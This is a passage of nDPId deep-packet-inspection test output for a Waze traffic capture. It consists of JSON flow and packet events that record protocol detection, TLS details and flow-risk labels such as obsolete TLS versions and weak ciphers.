+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587898822,"flow_last_seen":1435587898874,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1435587898874,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587905035,"flow_last_seen":1435587905035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587905035,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1435587905035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587905035,"pkt":"ABoRAAACABoRAAABCABFAAA82iNAAEAGeqYKCAABLjOtto0pAbvwXaAfAAAAAKAC\/\/\/IZgAAAgQFtAQCCAoACHo8AAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1435587905038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587905038,"pkt":"ABoRAAACABoRAAABCABFAAAodYZAABAGD1guM622CggAAQG7jSkPol\/g8F2gIFAS\/\/86+wAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1435587905039,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587905039,"pkt":"ABoRAAACABoRAAABCABFAAAo2iRAAEAGerkKCAABLjOtto0pAbvwXaAgD6Jf4VAQ\/\/86\/AAA"} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587905035,"flow_last_seen":1435587905111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587905111,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01096{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":580,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587905035,"flow_last_seen":1435587905510,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587905510,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} +01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587905035,"flow_last_seen":1435587905565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1435587905565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880580,"flow_last_seen":1435587880589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880580,"flow_last_seen":1435587880589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1435587868632,"flow_last_seen":1435587869162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1624,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587869162,"flow_last_seen":1435587869302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871656,"flow_last_seen":1435587871946,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871658,"flow_last_seen":1435587871945,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871941,"flow_last_seen":1435587872478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":552,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872476,"flow_last_seen":1435587872705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872702,"flow_last_seen":1435587872838,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":543,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587898822,"flow_last_seen":1435587899372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880579,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880579,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00920{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1435587868634,"flow_last_seen":1435587888318,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17204,"flow_tot_l4_payload_len":79914,"flow_avg_l4_payload_len":746,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587868635,"flow_last_seen":1435587884546,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3606,"flow_tot_l4_payload_len":9966,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00918{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1435587894241,"flow_last_seen":1435587901093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":5269,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00918{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587905035,"flow_last_seen":1435587907392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":4480,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1435587878606,"flow_last_seen":1435587882306,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11132,"flow_tot_l4_payload_len":42871,"flow_avg_l4_payload_len":1339,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1435587879018,"flow_last_seen":1435587882336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00817{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1435587879850,"flow_last_seen":1435587883075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8096,"flow_tot_l4_payload_len":26354,"flow_avg_l4_payload_len":941,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880587,"flow_last_seen":1435587880590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00571{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880587,"flow_last_seen":1435587880590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1435587871939,"flow_last_seen":1435587873226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3994,"flow_tot_l4_payload_len":8301,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1435587868996,"flow_last_seen":1435587869400,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":1420,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1435587878215,"flow_last_seen":1435587880857,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21888,"flow_tot_l4_payload_len":57094,"flow_avg_l4_payload_len":1730,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587871918,"flow_last_seen":1435587874945,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1435587871929,"flow_last_seen":1435587874378,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":4561,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1435587871935,"flow_last_seen":1435587874495,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880578,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880578,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880576,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 